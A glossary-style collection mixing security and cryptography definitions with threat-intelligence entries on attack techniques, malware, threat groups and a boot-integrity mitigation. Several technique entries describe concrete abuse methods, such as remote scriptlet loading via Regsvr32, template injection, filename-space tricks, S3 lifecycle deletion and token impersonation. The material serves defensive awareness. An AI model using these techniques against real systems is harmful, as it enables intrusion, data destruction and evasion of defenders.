Definition: Organization’s official responsible for: (i) Providing advice and other assistance to the head of the organization and other senior management personnel of the organization to ensure that information technology is acquired and information resources are managed in a manner that is consistent with laws, directives, policies, regulations, and priorities established by the head of the organization; (ii) Developing, maintaining, and facilitating the implementation of a sound and integrated information technology architecture for the organization; and (iii) Promoting the effective and efficient design and operation of all major information resources management processes for the organization, including improvements to work processes of the organization. Note: A subordinate organization may assign a chief information officer to denote an individual filling a position with security responsibilities with respect to the subordinate organization that are similar to those that the chief information officers fills for the organization to which they are subordinate.

Term: Tier 3 (COMSEC)
Definition: The lowest tier or layer of electronic key management system (EKMS) architecture comprising hand-receipt holders who use an electronic fill device (e.g., the Data Transfer Device (DTD), Secure DTD2000 System (SDS), Simple Key Loader (SKL)) and all other means to issue key to End Cryptographic Units (ECUs). Tier 3 elements receive keying material from Tier 2 activities by means of electronic fill devices or in canisters (for physical keying material).

Term: AC
Definition: Procedures and controls that limit or detect access to critical information resources. This can be accomplished through software, biometrics devices, or physical access to a controlled space.

Term: Trusted association
Definition: Assurance of the integrity of an asserted relationship between items of information that may be provided by cryptographic or non-cryptographic (e.g., physical) means. Also see Binding.

Term: natural person
Definition: A real-life human being, not synthetic or artificial.

Name: Archive via Custom Method
Type: attack-pattern
Description: An adversary may compress or encrypt data that is collected prior to exfiltration using a custom method. Adversaries may choose to use custom archival methods, such as encryption with XOR or stream ciphers implemented with no external library or utility references. Custom implementations of well-known compression algorithms have also been used.

Term: system or device certificate
Definition: The system or device whose name appears as the subject in a certificate.

Term: Capability, Trust Management
Definition: A characteristic of an entity that indicates its ability to perform certain functions or services correctly, fairly and impartially, along with assurance that the entity and its identifier are genuine.

Term: USB
Definition: Type of standard cable, connector, and protocol for connecting computers, electronic devices, and power sources.

Term: Key extraction
Definition: See Randomness extraction.

Term: assurance
Definition: The grounds for confidence that the set of intended security controls or privacy controls in an information system or organization are effective in their application.

Term: RIPE NCC
Definition: Regional Internet Registry for Europe, the Middle East, and parts of Central Asia that allocates and registers blocks of Internet number resources to Internet service providers (ISPs) and other organizations.

Name: Weaken Encryption
Type: attack-pattern
Description: Adversaries may compromise a network device’s encryption capability in order to bypass encryption that would otherwise protect data communications.

Encryption can be used to protect transmitted network traffic to maintain its confidentiality (protect against unauthorized disclosure) and integrity (protect against unauthorized changes). Encryption ciphers are used to convert a plaintext message to ciphertext and can be computationally intensive to decipher without the associated decryption key. Typically, longer keys increase the cost of cryptanalysis, or decryption without the key.

Adversaries can compromise and manipulate devices that perform encryption of network traffic. For example, through behaviors such as Modify System Image, Reduce Key Space, and Disable Crypto Hardware, an adversary can negatively effect and/or eliminate a device’s ability to securely encrypt network traffic. This poses a greater risk of unauthorized disclosure and may help facilitate data manipulation, Credential Access, or Collection efforts.

Term: working folder
Definition: The Windows folder that contains all the ISCMAx assessment files to be merged into an organizational assessment.

Name: cipher.exe
Type: tool
Description: cipher.exe is a native Microsoft utility that manages encryption of directories and files on NTFS (New Technology File System) partitions by using the Encrypting File System (EFS).

Term: IPComp
Definition: A protocol used to perform lossless compression for packet payloads.

Name: CARROTBALL
Type: tool
Description: CARROTBALL is an FTP downloader utility that has been in use since at least 2019. CARROTBALL has been used as a downloader to install SYSCON.

Term: overwrite
Definition: Writing one or more patterns of data on top of the physical location of data stored on the media.

Term: accountability
Definition: The property of being able to trace activities on a system to individuals who may then be held responsible for their actions.

Name: Regin
Type: malware
Description: Regin is a malware platform that has targeted victims in a range of industries, including telecom, government, and financial institutions. Some Regin timestamps date back to 2003.

Term: Chief Privacy Officer
Definition: The senior official designated by the head of each agency who has agency-wide responsibility for privacy, including implementing privacy protections; ensuring compliance with federal laws, regulations, and policies related to privacy; managing privacy risks at the agency; and filling a central policy-making role in the agency’s development and evaluation of legislative, regulatory, and other policy proposals.

Name: Boot or Logon Initialization Scripts
Type: attack-pattern
Description: Adversaries may use scripts automatically executed at boot or logon initialization to establish persistence. Initialization scripts can be used to perform administrative functions, which may often execute other programs or send information to an internal logging server. These scripts can vary based on operating system and whether applied locally or remotely. 

Adversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary. 

An adversary may also be able to escalate their privileges since some boot or logon initialization scripts run with higher privileges.

Name: Samurai
Type: malware
Description: Samurai is a passive backdoor that has been used by ToddyCat since at least 2020. Samurai allows arbitrary C# code execution and is used with multiple modules for remote administration and lateral movement.

Term: information system-related security risks
Definition: A measure of the extent to which an entity is threatened by a potential circumstance or event, and typically a function of: (i) the adverse impacts that would arise if the circumstance or event occurs; and (ii) the likelihood of occurrence.

Term: Data-encryption key
Definition: A key used to encrypt and decrypt data other than keys.

Term: ABAC
Definition: High-level requirements that specify how access is managed and who may access information under what circumstances.

Term: key management
Definition: The activities involving the handling of cryptographic keys and other related security parameters (e.g., initialization vectors) during the entire lifecycle of the keys, including their generation, storage, establishment, entry and output, use and destruction.

Term: self-supervised learning
Definition: A type of machine learning that relies on generating implicit la­bels from unstructured data rather than relying on explicit, human-created labels. Self-supervised learning tasks are constructed to allow the true labels to be automatically inferred from the training data (enabling the use of large-scale training data) and to require models to capture essential features or relationships within the data to solve them. For example, a common self-supervised learning task is providing a model with partial data with the task to accurately generate the re­mainder.

Term: Airdrop
Definition: A distribution of digital tokens to a list of blockchain addresses.

Term: security-relevant event
Definition: An occurrence (e.g., an auditable event or flag) considered to have potential security implications to the system or its environment that may require further action (noting, investigating, or reacting).

Term: Assurance message
Definition: See private-key-possession assurance message.

Name: Default Accounts
Type: attack-pattern
Description: Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS, the root user account in ESXi, and the default service account in Kubernetes.

Default accounts are not limited to client machines; rather, they also include accounts that are preset for equipment such as network devices and computer applications, whether they are internal, open source, or commercial. Appliances that come preset with a username and password combination pose a serious threat to organizations that do not change it post installation, as they are easy targets for an adversary. Similarly, adversaries may also utilize publicly disclosed or stolen Private Keys or credential materials to legitimately connect to remote environments via Remote Services.

Default accounts may be created on a system after initial setup by connecting or integrating it with another application. For example, when an ESXi server is connected to a vCenter server, a default privileged account called `vpxuser` is created on the ESXi server. If a threat actor is able to compromise this account’s credentials (for example, via Exploitation for Credential Access on the vCenter host), they will then have access to the ESXi server.

Term: Digital Signature Algorithm
Definition: A public-key algorithm that is used for the generation and verification of digital signatures.

Term: Per-message secret number
Definition: A secret random number that is generated prior to the generation of each digital signature.

Term: active cyber defense
Definition: Synchronized, real-time capability to discover, detect, analyze, and mitigate threats and vulnerabilities.

Term: utility
Definition: The degree to which a dataset or statistic is useful for a specific purpose.

Term: authorized user
Definition: Any appropriately provisioned individual with a requirement to access an information system.

Term: Entropy
Definition: A measure of the amount of uncertainty an attacker faces to determine the value of a secret. Entropy is usually stated in bits. A value havingnbits of entropy has the same degree of uncertainty as a uniformly distributedn-bit random value.

Name: Bonadan
Type: malware
Description: Bonadan is a malicious version of OpenSSH which acts as a custom backdoor. Bonadan has been active since at least 2018 and combines a new cryptocurrency-mining module with the same credential-stealing module used by the Onderon family of backdoors.

Name: Template Injection
Type: attack-pattern
Description: Adversaries may create or modify references in user document templates to conceal malicious code or force authentication attempts. For example, Microsoft’s Office Open XML (OOXML) specification defines an XML-based format for Office documents (.docx, xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). OOXML files are packed together ZIP archives compromised of various XML files, referred to as parts, containing properties that collectively define how a document is rendered.

Properties within parts may reference shared public resources accessed via online URLs. For example, template properties may reference a file, serving as a pre-formatted document blueprint, that is fetched when the document is loaded.

Adversaries may abuse these templates to initially conceal malicious code to be executed via user documents. Template references injected into a document may enable malicious payloads to be fetched and executed when the document is loaded. These documents can be delivered via other techniques such as Phishing and/or Taint Shared Content and may evade static detections since no typical indicators (VBA macro, script, etc.) are present until after the malicious payload is fetched. Examples have been seen in the wild where template injection was used to load malicious code containing an exploit.

Adversaries may also modify the <code>*\template</code> control word within an .rtf file to similarly conceal then download malicious code. This legitimate control word value is intended to be a file destination of a template file resource that is retrieved and loaded when an .rtf file is opened. However, adversaries may alter the bytes of an existing .rtf file to insert a template control word field to include a URL resource of a malicious payload.

This technique may also enable Forced Authentication by injecting a SMB/HTTPS (or other credential prompting) URL and triggering an authentication attempt.

Name: Cloud Administration Command
Type: attack-pattern
Description: Adversaries may abuse cloud management services to execute commands within virtual machines. Resources such as AWS Systems Manager, Azure RunCommand, and Runbooks allow users to remotely run scripts in virtual machines by leveraging installed virtual machine agents. 

If an adversary gains administrative access to a cloud environment, they may be able to abuse cloud management services to execute commands in the environment’s virtual machines. Additionally, an adversary that compromises a service provider or delegated administrator account may similarly be able to leverage a Trusted Relationship to execute commands in connected virtual machines.

Term: Media Access Control Security
Definition: Provides interoperable cryptographically- based security for Ethernet. The set of security services offered includes access control, connectionless integrity, data origin authentication, detection and rejection of replays (a form of partial sequence integrity) and confidentiality (via encryption).

Term: Generation-Encryption
Definition: The process of CCM in which a MAC is generated on the payload and the associated data, and encryption is applied to the payload and the MAC.

Name: Deploy Container
Type: attack-pattern
Description: Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. In Kubernetes environments, an adversary may attempt to deploy a privileged or vulnerable container into a specific node in order to Escape to Host and access other containers running on the node. 

Containers can be deployed by various means, such as via Docker's <code>create</code> and <code>start</code> APIs or via a web application such as the Kubernetes dashboard or Kubeflow. In Kubernetes environments, containers may be deployed through workloads such as ReplicaSets or DaemonSets, which can allow containers to be deployed across multiple nodes. Adversaries may deploy containers based on retrieved or built malicious images or from benign images that download and execute malicious payloads at runtime.

Term: common control
Definition: A security or privacy control that is inherited by multiple information systems or programs.

Term: trusted path
Definition: A mechanism by which a user (through an input device) can communicate directly with the security functions of the information system with the necessary confidence to support the system security policy. This mechanism can only be activated by the user or the security functions of the information system and cannot be imitated by untrusted software.

Term: FQDN
Definition: An unambiguous identifier that contains every domain level, including the top-level domain.

Term: keying material
Definition: The data (e.g., keys) necessary to establish and maintain cryptographic keying relationships.

Term: authorized user
Definition: Any appropriately cleared individual with a requirement to access an information system (IS) for performing or assisting in a lawful and authorized government function.

Term: Integer Factorization Cryptography
Definition: Integer factorization cryptography

Term: FAR
Definition: False Accept Rate (defined over an authentication transaction)

Name: Space after Filename
Type: attack-pattern
Description: Adversaries can hide a program's true filetype by changing the extension of a file. With certain file types (specifically this does not work with .app extensions), appending a space to the end of a filename will change how the file is processed by the operating system.

For example, if there is a Mach-O executable file called <code>evil.bin</code>, when it is double clicked by a user, it will launch Terminal.app and execute. If this file is renamed to <code>evil.txt</code>, then when double clicked by a user, it will launch with the default text editing application (not executing the binary). However, if the file is renamed to <code>evil.txt </code> (note the space at the end), then when double clicked by a user, the true file type is determined by the OS and handled appropriately and the binary will be executed .

Adversaries can use this feature to trick users into double clicking benign-looking files of any format and ultimately executing something malicious.

Term: <em>Key2</em>
Definition: The second component of a TDEA key.

Term: mobile mode
Definition: Software programs or parts of programs obtained from remote information systems, transmitted across a network, and executed on a local information system without explicit installation or execution by the recipient.

Term: Computer Security Incident
Definition: An occurrence that actually or imminently jeopardizes, without lawful authority, the confidentiality, integrity, or availability of information or an information system or constitutes a violation or imminent threat of violation of law, security policies, security procedures, or acceptable use policies.

Name: PHPsert
Type: malware
Description: PHPsert is a webshell used to execute PHP code that has been in use since at least 2023 against targets in Japan, Singapore, Peru, Taiwan, Iran, Republic of Korea, and the Philippines. PHPsert is not typically deployed as a standalone but integrated into web content such as text editors and content management systems.

Term: authorize processing
Definition: See Accreditation.

Term: <strong>Shall</strong>
Definition: The term used to indicate a requirement that needs to be fulfilled to claim conformance to this Recommendation. Note that shall may be coupled with not to become shall not.

Term: Software Asset Management
Definition: See Capability, Software Asset Management.

Name: Magic Hound
Type: intrusion-set
Description: Magic Hound is an Iranian-sponsored threat group that conducts long term, resource-intensive cyber espionage operations, likely on behalf of the Islamic Revolutionary Guard Corps. They have targeted European, U.S., and Middle Eastern government and military personnel, academics, journalists, and organizations such as the World Health Organization (WHO), via complex social engineering campaigns since at least 2014.

Term: Privacy Control Assessor
Definition: The individual, group, or organization responsible for conducting a privacy control assessment.

Term: network access
Definition: Access to an organizational information system by a user (or a process acting on behalf of a user) communicating through a network (e.g., local area network, wide area network, Internet).

Term: personally identifiable information processing
Definition: An operation or set of operations performed upon personally identifiable information that can include, but is not limited to, the collection, retention, logging, generation, transformation, use, disclosure, transfer, and disposal of personally identifiable information.

Name: BackConfig
Type: malware
Description: BackConfig is a custom Trojan with a flexible plugin architecture that has been used by Patchwork.

Term: collision
Definition: An event in which two different messages have the same message digest.

Term: unit of privacy
Definition: The choice of definition for neighboring datasets.

Term: party
Definition: An individual (person), organization, device or process. Used interchangeably with “entity”.

Term: COMSEC control program
Definition: Computer instructions or routines controlling or affecting the externally performed functions of key generation, key distribution, message encryption/decryption, or authentication. 
Rationale: The term falls under the broader term “COMSEC material”.

Term: key
Definition: A parameter that determines the transformation using DEA and TDEA forward and inverse operations.

Name: CASTLETAP
Type: malware
Description: CASTLETAP is an ICMP port knocking backdoor that has been installed on compromised FortiGate firewalls by UNC3886.

Term: Discrete Process
Definition: A type of process where a specified quantity of material moves as a unit (part or group of parts) between work stations and each unit maintains its unique identity.

Term: bit
Definition: A binary digit having a value of 0 or 1.

Term: prerequisite
Definition: A required input to an algorithm that has been established prior to the invocation of the algorithm.

Term: abstraction
Definition: View of an object that focuses on the information relevant to a particular purpose and ignores the remainder of the information.

Term: WGS 84
Definition: An Earth-centered, Earth-fixed terrestrial reference system and geodetic datum. WGS 84 is based on a consistent set of constants and model parameters that describe the Earth’s size, shape, gravity, and geomagnetic fields. WGS 84 is the standard U.S. Department of Defense definition of a global reference system for geospatial information and is the reference system for GPS. It is consistent with the International Terrestrial Reference System (ITRS).

Term: risk evaluation
Definition: Process of comparing the results of risk analysis with risk criteria to determine whether the risk and/or its magnitude is/are acceptable or tolerable.

Name: Industroyer
Type: malware
Description: Industroyer is a sophisticated malware framework designed to cause an impact to the working processes of Industrial Control Systems (ICS), specifically components used in electrical substations. Industroyer was used in the attacks on the Ukrainian power grid in December 2016. This is the first publicly known malware specifically designed to target and impact operations in the electric grid.

Term: key transport
Definition: A key-establishment procedure whereby one party (the sender) selects a value for the secret keying material and then securely distributes that value to another party (the receiver). Contrast with key agreement.

Term: Double spend (attack)
Definition: An attack where a blockchain network user attempts to explicitly double spend a digital asset.

Term: Cyber Attack
Definition: An attempt to gain unauthorized access to system services, resources, or information, or an attempt to compromise system integrity, availability, or confidentiality.

Term: engineered system
Definition: A system designed or adapted to interact with an anticipated operational environment to achieve one or more intended purposes while complying with applicable constraints.

Term: control baseline
Definition: The set of controls that are applicable to information or an information system to meet legal, regulatory, or policy requirements, as well as address protection needs for the purpose of managing risk.

Term: SoR
Definition: A collection of records that contain information about individuals and are under the control of an agency. The records can be retrieved by the individual’s name, an identifying number, a symbol, or other identifier.

Term: PKI
Definition: The framework and services that provide for the generation, production, distribution, control, accounting, and destruction of public key certificates. Components include the personnel, policies, processes, server platforms, software, and workstations used for the purpose of administering certificates and public-private key pairs, including the ability to issue, maintain, recover, and revoke public key certificates.

Term: digital signature
Definition: The result of a cryptographic transformation of data that, when properly implemented, provides the services of 1. Source authentication, 2. Data integrity, and 3. Support for signer non-repudiation.

Term: <em>A(i)</em>
Definition: The output of the <i>i</i><sup>th</sup> iteration in the first pipeline of a double pipeline iteration mode.

Term: Access Point (AP)
Definition: A device that logically connects wireless client devices operating in infrastructure to one another and provides access to a distribution system, if connected, which is typically an organization’s enterprise wired network.

Name: APT33
Type: intrusion-set
Description: APT33 is a suspected Iranian threat group that has carried out operations since at least 2013. The group has targeted organizations across multiple industries in the United States, Saudi Arabia, and South Korea, with a particular interest in the aviation and energy sectors.

Term: AI
Definition: The use of attributes and methods to uniquely identify an asset.

Term: +
Definition: Addition.

Name: Moonstone Sleet
Type: intrusion-set
Description: Moonstone Sleet is a North Korean-linked threat actor executing both financially motivated attacks and espionage operations. The group previously overlapped significantly with another North Korean-linked entity, Lazarus Group, but has differentiated its tradecraft since 2023. Moonstone Sleet is notable for creating fake companies and personas to interact with victim entities, as well as developing unique malware such as a variant delivered via a fully functioning game.

Term: end-to-end security
Definition: Safeguarding information in an information system from point of origin to point of destination.

Term: media
Definition: Physical devices or writing surfaces including, but not limited to, magnetic tapes, optical disks, magnetic disks, Large-Scale Integration (LSI) memory chips, printouts (but not including display media) onto which information is recorded, stored, or printed within an information system.

Name: Binary Padding
Type: attack-pattern
Description: Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This can be done without affecting the functionality or behavior of a binary, but can increase the size of the binary beyond what some security tools are capable of handling due to file size limitations. 

Binary padding effectively changes the checksum of the file and can also be used to avoid hash-based blocklists and static anti-virus signatures. The padding used is commonly generated by a function to create junk data and then appended to the end or applied to sections of malware. Increasing the file size may decrease the effectiveness of certain tools and detection capabilities that are not designed or configured to scan large files. This may also reduce the likelihood of being collected for analysis. Public file scanning services, such as VirusTotal, limits the maximum size of an uploaded file to be analyzed.

Term: Cryptoperiod
Definition: Time span during which each key setting remains in effect.

Term: Signature verification
Definition: The use of a digital signature and a public key to verify a digital signature on data.

Term: IV
Definition: A bit string that is used as an initial value in computing the first iteration of the PRF in feedback mode. It may be an empty string.

Term: Visibility
Definition: A property of openness and accountability throughout the supply chain.

Term: CUI
Definition: A categorical designation that refers to unclassified information that does not meet the standards for National Security Classification under Executive Order 12958, as amended, but is (i) pertinent to the national interests of the United States or to the important interests of entities outside the federal government, and (ii) under law or policy requires protection from unauthorized disclosure, special handling safeguards, or prescribed limits on exchange or dissemination.

Term: Initial Analysis
Definition: Internal phase within the NVD where an NVD Analyst begins to review a CVE and adds the appropriate metadata.

Term: likelihood of occurrence
Definition: See likelihood of occurrence.

Term: PNT solution
Definition: The full solution provided by a PNT system or source, including time, position, and velocity. A PNT system or source may provide a full PNT solution or a part of it. For example, a GNSS receiver provides a full PNT solution, while a local clock provides only a timing or frequency solution.

Term: Identity Management System (IDMS)
Definition: Identity management system comprised of one or more systems or applications that manages the identity verification, validation and issuance process.

Term: nonlocal maintenance
Definition: Maintenance activities conducted by individuals communicating through a network, either an external network (e.g., the Internet) or an internal network.

Term: enabling system
Definition: System that supports a system of interest during its life cycle stages but does not necessarily contribute directly to its function during operation.

Term: C1,…,C64
Definition: Bits of the Ciphertext Block

Name: Regsvr32
Type: attack-pattern
Description: Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. The Regsvr32.exe binary may also be signed by Microsoft. 

Malicious usage of Regsvr32.exe may avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of allowlists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe can also be used to specifically bypass application control using functionality to load COM scriptlets to execute DLLs under user permissions. Since Regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed. This variation of the technique is often referred to as a "Squiblydoo" and has been used in campaigns targeting governments. 

Regsvr32.exe can also be leveraged to register a COM Object used to establish persistence via Component Object Model Hijacking.

Name: Embedded Payloads
Type: attack-pattern
Description: Adversaries may embed payloads within other files to conceal malicious content from defenses. Otherwise seemingly benign files (such as scripts and executables) may be abused to carry and obfuscate malicious payloads and content. In some cases, embedded payloads may also enable adversaries to Subvert Trust Controls by not impacting execution controls such as digital signatures and notarization tickets. 

Adversaries may embed payloads in various file formats to hide payloads. This is similar to Steganography, though does not involve weaving malicious content into specific bytes and patterns related to legitimate digital media formats. 

For example, adversaries have been observed embedding payloads within or as an overlay of an otherwise benign binary. Adversaries have also been observed nesting payloads (such as executables and run-only scripts) inside a file of the same format. 

Embedded content may also be used as Process Injection payloads used to infect benign system processes. These embedded then injected payloads may be used as part of the modules of malware designed to provide specific features such as encrypting C2 communications in support of an orchestrator module. For example, an embedded module may be injected into default browsers, allowing adversaries to then communicate via the network.

Term: cryptographic module
Definition: The set of hardware, software, and/or firmware that implements approved cryptographic functions (including key generation) that are contained within the cryptographic boundary of the module.

Name: Boot Integrity
Type: course-of-action
Description: Boot Integrity ensures that a system starts securely by verifying the integrity of its boot process, operating system, and associated components. This mitigation focuses on leveraging secure boot mechanisms, hardware-rooted trust, and runtime integrity checks to prevent tampering during the boot sequence. It is designed to thwart adversaries attempting to modify system firmware, bootloaders, or critical OS components. This mitigation can be implemented through the following measures:

Implementation of Secure Boot:

- Implementation: Enable UEFI Secure Boot on all systems and configure it to allow only signed bootloaders and operating systems.
- Use Case: An adversary attempts to replace the system’s bootloader with a malicious version to gain persistence. Secure Boot prevents the untrusted bootloader from executing, halting the attack.

Utilization of TPMs:

- Implementation: Configure systems to use TPM-based attestation for boot integrity, ensuring that any modification to the firmware, bootloader, or OS is detected.
- Use Case: A compromised firmware component alters the boot sequence. The TPM detects the change and triggers an alert, allowing the organization to respond before further damage.

Enable Bootloader Passwords:

- Implementation: Protect BIOS/UEFI settings with a strong password and limit physical access to devices.
- Use Case: An attacker with physical access attempts to disable Secure Boot or modify the boot sequence. The password prevents unauthorized changes.

Runtime Integrity Monitoring:

- Implementation: Deploy solutions to verify the integrity of critical files and processes after boot.
- Use Case: A malware infection modifies kernel modules post-boot. Runtime integrity monitoring detects the modification and prevents the malicious module from loading.

Term: baseline configuration
Definition: A documented set of specifications for a system or a configuration item within a system that has been formally reviewed and agreed on at a given point in time and which can be changed only through change control procedures.

Term: Problematic Data Action
Definition: A data action that could cause an adverse effect for individuals

Term: GPT
Definition: A family of machine learning models based on the transformer architecture that are pre-trained through self-supervised learning on large data sets of unlabelled text. This is the current predominant architecture for large language models.

Term: consent banner
Definition: A persistent visible window on a computer monitor that displays the highest level of data accessible during the current session.

Term: assertion presentation
Definition: The method by which an assertion is transmitted to the RP.

Name: Trusted Relationship
Type: attack-pattern
Description: Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship abuses an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network.

Organizations often grant elevated access to second or third-party external providers in order to allow them to manage internal systems as well as cloud-based environments. Some examples of these relationships include IT services contractors, managed security providers, infrastructure contractors (e.g. HVAC, elevators, physical security). The third-party provider's access may be intended to be limited to the infrastructure being maintained, but may exist on the same network as the rest of the enterprise. As such, Valid Accounts used by the other party for access to internal network systems may be compromised and used.

In Office 365 environments, organizations may grant Microsoft partners or resellers delegated administrator permissions. By compromising a partner or reseller account, an adversary may be able to leverage existing delegated administrator relationships or send new delegated administrator offers to clients in order to gain administrative control over the victim tenant.

Name: Lifecycle-Triggered Deletion
Type: attack-pattern
Description: Adversaries may modify the lifecycle policies of a cloud storage bucket to destroy all objects stored within. 

Cloud storage buckets often allow users to set lifecycle policies to automate the migration, archival, or deletion of objects after a set period of time. If a threat actor has sufficient permissions to modify these policies, they may be able to delete all objects at once. 

For example, in AWS environments, an adversary with the `PutLifecycleConfiguration` permission may use the `PutBucketLifecycle` API call to apply a lifecycle policy to an S3 bucket that deletes all objects in the bucket after one day. In addition to destroying data for purposes of extortion and Financial Theft, adversaries may also perform this action on buckets storing cloud logs for Indicator Removal.

Term: adversity
Definition: The conditions that can cause a loss of assets (e.g., threats, attacks, vulnerabilities, hazards, disruptions, and exposures).

Term: Test, Training, and Exercise (TT&E) Program
Definition: A means for ensuring that personnel are trained in their IT plan roles and responsibilities; IT plans are exercised to validate their viability; and IT components or systems are tested to validate their operability.

Name: Unused/Unsupported Cloud Regions
Type: attack-pattern
Description: Adversaries may create cloud instances in unused geographic service regions in order to evade detection. Access is usually obtained through compromising accounts used to manage cloud infrastructure.

Cloud service providers often provide infrastructure throughout the world in order to improve performance, provide redundancy, and allow customers to meet compliance requirements. Oftentimes, a customer will only use a subset of the available regions and may not actively monitor other regions. If an adversary creates resources in an unused region, they may be able to operate undetected.

A variation on this behavior takes advantage of differences in functionality across cloud regions. An adversary could utilize regions which do not support advanced detection services in order to avoid detection of their activity.

An example of adversary use of unused AWS regions is to mine cryptocurrency through Resource Hijacking, which can cost organizations substantial amounts of money over time depending on the processing power used.

Term: dynamic code analyzer
Definition: A tool that analyzes computer software by executing programs built from the software being analyzed on a real or virtual processor and observing its behavior, probing the application and analyzing application responses.

Term: System Integrator
Definition: An organization that customizes (e.g., combines, adds, optimizes) components, systems, and corresponding processes. The integrator function can also be performed by acquirer.

Term: traceability matrix
Definition: A matrix that records the relationship between two or more products of the development process (e.g., a matrix that records the relationship between the requirements and the design of a given software component). 
Note 1: A traceability matrix can record the relationship between a set of requirements and one or more products of the development process and can be used to demonstrate completeness and coverage of an activity or analysis based upon the requirements contained in the matrix. 
Note 2: A traceability matrix may be conveyed as a set of matrices representing requirements at different levels of decomposition. Such a traceability matrix enables the tracing of requirements stated in their most abstract form (e.g., statement of stakeholder requirements) through decomposition steps that result in the implementation that satisfies the requirements.

Term: key transport
Definition: Secure transport of cryptographic keys from one cryptographic module to another module. When used in conjunction with a public key (asymmetric) algorithm, keying material is encrypted using a public key and subsequently decrypted using a private key. When used in conjunction with a symmetric algorithm, key transport is known as key wrapping.

Term: digital signature
Definition: The result of a cryptographic transformation of data that, when properly implemented, provides origin authentication, assurance of data integrity and supports signatory nonrepudiation.

Term: HMAC
Definition: A message authentication code that uses a cryptographic key in conjunction with a hash function.

Term: System authority
Definition: An FCKMS role that is responsible to executive-level management (e.g., the Chief Information Officer) for the overall operation and security of an FCKMS. A system authority manages all operational FCKMS roles.

Term: Managed Environment
Definition: Inward-facing environment that is typically very structured and centrally managed.

Term: CNN
Definition: A class of feed-forward neural networks that include at least one convolutional layer, referred to as CNNs. In convolutional layers, feature detectors (known as kernels or filters) detect specific features across the input data. CNNs are primarily used for processing grid-like data, such as images, and are particularly effective for tasks like image classification, object detection, and image segmentation.

Term: threat scenario
Definition: A set of discrete threat events, associated with a specific threat source or multiple threat sources, partially ordered in time.

Term: Smart Meter
Definition: A device that includes Metrology, Communications Module, and, optionally, HAN interface. These components are typically integrated into a single physical unit suitable for installation in a standard utility meter socket. Sub-components may or may not be integrated on the printed circuit boards contained within the Smart Meter.

Term: system of systems
Definition: Set of systems or system elements that interact to provide a unique capability that none of the constituent systems can accomplish on its own.

Term: Federation Credential Service Provider
Definition: A trusted entity that issues or registers subscriber authenticators and issues electronic credentials to subscribers. A CSP may be an independent third party or issue credentials for its own use.

Term: OLIR Template
Definition: A spreadsheet that contains the fields necessary for creating a well-formed Informative Reference for submission to the OLIR Program. It serves as the starting point for the Developer.

Term: Capability, Boundary Management
Definition: See Capability, Boundary Management.

Term: data integrity
Definition: Assurance that the data are unchanged from creation to reception.

Term: Script
Definition: A sequence of instructions, ranging from a simple list of operating system commands to full-blown programming language statements, which can be executed automatically by an interpreter.

Term: interface
Definition: Wherever two or more logical, physical, or both system elements or software system elements meet and act on or communicate with each other.

Term: Support a security strength
Definition: <p>A security strength of <i>s</i> bits is said to be supported by a particular choice of algorithm, primitive, auxiliary function, or parameters for use in the implementation of a cryptographic mechanism if that choice will not prevent the resulting implementation from attaining a security strength of at least <i>s</i> bits.</p><p>In this Recommendation, it is assumed that implementation choices are intended to support a security strength of 112 bits or more (see [SP 800-57] and [SP 800-131A]).</p>

Name: Make and Impersonate Token
Type: attack-pattern
Description: Adversaries may make new tokens and impersonate users to escalate privileges and bypass access controls. For example, if an adversary has a username and password but the user is not logged onto the system the adversary can then create a logon session for the user using the `LogonUser` function. The function will return a copy of the new session's access token and the adversary can use `SetThreadToken` to assign the token to a thread.

This behavior is distinct from Token Impersonation/Theft in that this refers to creating a new user token instead of stealing or duplicating an existing one.

Term: trustworthiness
Definition: Worthy of being trusted to fulfill whatever critical requirements may be needed.

Term: approved
Definition: FIPS-approved and/or NIST-recommended. An algorithm or technique that is either 1) specified in a FIPS or NIST Recommendation, or 2) specified elsewhere and adopted by reference in a FIPS or NIST Recommendation.

Term: <em>Len</em>
Definition: The number of n-byte string elements in a WOTS+ private key, public key, and signature.

Name: GLOOXMAIL
Type: malware
Description: GLOOXMAIL is malware used by APT1 that mimics legitimate Jabber/XMPP traffic.

Term: artificial intelligence system
Definition: Any data system, software, hardware, application, tool, or utility that operates in whole or in part using AI.

Term: Plaintext data
Definition: In this Recommendation, data that will be encrypted by an encryption algorithm or obtained from ciphertext using a decryption algorithm.

Term: negative risk
Definition: Potential cause of unacceptable asset loss and the undesirable consequences or impact of such a loss.

Term: Sponge Function
Definition: A function that is defined according to the sponge construction, possibly specialized to a fixed output length.

Term: FCKMS service provider (FCKMS service-providing organization)
Definition: An entity that provides FCKMS key-management services to one or more FCKMS service-using organizations in accordance with their respective FCKMS Security Policies.

Term: privacy program plan
Definition: A formal document that provides an overview of an agency’s privacy program, including a description of the structure of the privacy program, the resources dedicated to the privacy program, the role of the Senior Agency Official for Privacy and other privacy officials and staff, the strategic goals and objectives of the privacy program, and the program management controls and common controls in place or planned for meeting applicable privacy requirements and managing privacy risks.

Term: Prime number generation seed
Definition: A string of random bits that is used to begin a search for a prime number with the required characteristics.

Term: isomorphism (of elliptic curves)
Definition: A bijective mapping from one elliptic curve to another, which maps addition (on the first curve) to addition (on the image curve).

Term: Modified condition decision coverage
